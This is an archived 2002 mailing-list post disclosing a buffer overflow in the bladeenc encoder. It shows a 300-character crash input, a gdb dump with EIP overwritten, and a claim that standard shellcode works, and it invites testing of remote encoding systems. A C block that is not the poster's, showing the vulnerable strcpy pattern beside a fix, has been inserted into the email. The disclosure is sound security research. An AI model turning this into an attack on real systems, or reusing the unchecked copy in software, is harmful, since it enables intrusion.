Vulnerability Development mailing list archives

buffer overflow in bladeenc


From: Peter Boutzev <boutzev () bulgaria com>
Date: Tue, 19 Feb 2002 22:20:07 +0100

Hello everybody,

Some time ago I discovered a buffer overflow vulnerability in bladeenc. 

Bladeenc is an open source mp3 encoder, widely used under Linux. 

The program segfaults when a large string is given as argument on program 
startup. Under normal conditions, the syntax of bladeenc is like :

bladeenc filename.wav

If you change 'filename.wav' to a large string (around 300 chars), bladeenc
crashes, overwriting %eip. Also, other options which can be specified through
argv[] can be exploited too. (I guess that the problem can be found in the 
argument parsing functions of the program - I didn't have much time to 
investigate the source, but a brief grep strcpy of the source gives a few lines 
of output which may be useful)
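As an added illustration (not bladeenc's source and not the poster's code), the unchecked argv-to-buffer copy pattern the post suspects, next to a bounds-checked replacement that rejects over-long arguments instead of truncating them; NAME_MAX_LEN and the function names are assumptions:

```c
/* Added example, not bladeenc's code: the unchecked argv-to-buffer copy the
 * post suspects, next to a bounds-checked version. NAME_MAX_LEN is assumed. */
#include <stdio.h>
#include <string.h>
#define NAME_MAX_LEN 256          /* assumed fixed-size filename buffer */

/* Vulnerable pattern: strcpy() trusts the argv[] length, so a 300-byte argument
 * runs past 'name' into the saved frame pointer and return address (the
 * 0x41414141 values in the post's register dump). Shown only; never called. */
int open_input_unsafe(const char *arg)
{
    char name[NAME_MAX_LEN];
    strcpy(name, arg);            /* no length check */
    return (int)strlen(name);
}

/* Hardened version: look for the terminator only within what the buffer can
 * hold, reject if it is not there, then copy exactly n bytes. -1 on rejection. */
int open_input_safe(const char *arg, char *out, size_t outlen)
{
    const char *end;
    if (arg == NULL || out == NULL || outlen == 0) return -1;
    end = memchr(arg, '\0', outlen);  /* never scan further than we can hold */
    if (end == NULL) return -1;       /* no room for '\0': reject, do not truncate */
    memcpy(out, arg, (size_t)(end - arg));
    out[end - arg] = '\0';
    return (int)(end - arg);
}

/* Runs a constructed argument of len bytes of 'a' (the post's test input)
 * through the safe path and returns its result. */
int check_argv_len(size_t len)
{
    char big[512], dst[NAME_MAX_LEN];
    if (len >= sizeof big) return -2;
    memset(big, 'a', len);
    big[len] = '\0';
    return open_input_safe(big, dst, sizeof dst);
}

int main(int argc, char **argv)
{
    char dst[NAME_MAX_LEN];
    if (argc < 2 || open_input_safe(argv[1], dst, sizeof dst) < 0) {
        fprintf(stderr, "usage: %s file.wav (under %d chars)\n", argv[0], NAME_MAX_LEN);
        return 1;
    }
    printf("encoding %s\n", dst);
    return 0;
}
```

Running it with the post's 300-character argument exits with the usage message instead of crashing, and the same bound should be applied to every other argv[] option the program copies.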

Below is a shot of what happens:

[pesho@dingo stack]$ bladeenc `perl -e "print 'a' x 300"`
Segmentation fault (core dumped)
[pesho@dingo stack]$ gdb bladeenc core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
........
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb) info reg
eax            0x41414141       1094795585
ecx            0x12c    300
edx            0xbffffa00       -1073743360
ebx            0x41414141       1094795585
esp            0xbfffe470       0xbfffe470
ebp            0x41414141       0x41414141   <---
esi            0x41414141       1094795585   <---
edi            0x41414141       1094795585   <---
eip            0x41414141       0x41414141    <--- here we are ...
eflags         0x10216  66070
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x804a34a        134521674
foseg          0x2b     43
fooff          0xbfffe4d8       -1073748776
fop            0x59d    1437
(gdb)

So, as you see, the overflow is exploitable. I am not going to post
an exploit to it, although very basic standard shellcode works against it.

The overflow isn't really a security hole, since the binary isn't setuid. 
However, looking around with Google, there are a few systems that use
bladeenc for some kind of 'distributed mp3 encoding'. They apparently consist
of different daemons exchanging parts of audio and encoding them with 
bladeenc. There are a few of those systems that could possibly be exploited (and 
probably REMOTELY) using this overflow. 

Maybe someone on the list would like to test such systems and do some more
research on the 'vulnerability'. 

For people who would like to test, standard shellcode from 'smashing the 
stack ...' should do the job.

The author has been informed around two months ago - no answer received.
At the time of the tests, the last stable version was still vulnerable - I 
don't know if the version has changed since.

Thank you all.

Peter
-- 
------------------------------------------------------------------
  Peter Boutzev                        Ubizen (Luxembourg) 
  Security Engineer                    We Secure e-Business
  Phone   +352 26 31 05 85       http://www.ubizen.com
  Fax     +352 26 31 05 86 
------------------------------------------------------------------


